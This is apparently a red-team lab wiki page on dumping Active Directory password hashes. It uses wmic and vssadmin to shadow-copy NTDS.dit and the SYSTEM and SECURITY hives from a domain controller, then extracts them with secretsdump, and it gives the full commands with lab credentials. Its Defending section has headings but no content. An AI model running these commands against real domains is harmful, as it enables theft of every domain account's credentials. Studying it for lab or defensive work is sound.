Vssadmin Shadow Copy

Configuring

No need to configure anything.

Attacking

How it works

With Domain Admin credentials it is possible to copy the NTDS.dit, SYSTEM and SECURITY hives remotely from the Domain Controller.

Tools

Secretsdump.py

Executing the attack

The attack requires Domain Admin credentials and is a post exploitation attack to extract credentials.

Login to WS01 as a normal user. For example Richard and the password Sample123.
Open PowerShell and Execute the following command to create a shadowcopy of the C: disk with the vssadmin utility.

wmic /node:dc02 /user:administrator@amsterdam.bank.local /password:'Welcome01!' process call create "cmd /c vssadmin create shadow /for=C: 2>&1"

3. Now we can copy the NTDS.dit, SYSTEM and SECURITY hives to the C:\temp directory.

wmic /node:dc02 /user:administrator@amsterdam.bank.local /password:'Welcome01!' process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY c:\temp\"

Make sure the C:\temp directory exists on the DC before executing this command!

4. The next step is to mount the C:\temp directory and access the files:

$creds = Get-Credential
New-PSDrive -Credential $creds -Name j \\dc02\c$\temp -PSProvider FileSystem
cd \\dc02\c$\temp

5. Copy the files to your Kali and execute the following command to extract the credentials.

python3 /opt/impacket/examples/secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit local

Defending

Recommendations

Detection

References

Dumping Domain Controller Hashes via wmic and Vssadmin Shadow Copy | Red Team Noteswww.ired.team

PreviousServices (todo)Nextms-ds-machineaccountquota (todo)

Last updated 3 years ago